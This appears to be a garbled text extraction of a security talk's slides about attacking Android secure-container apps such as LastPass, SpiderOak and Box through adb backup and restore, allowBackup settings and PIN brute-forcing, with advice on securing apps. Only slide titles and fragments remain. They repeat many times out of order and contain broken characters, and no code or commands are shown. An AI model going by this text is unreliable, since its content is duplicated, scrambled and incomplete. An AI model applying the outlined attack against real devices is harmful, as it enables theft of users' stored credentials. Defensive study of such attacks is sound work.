Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


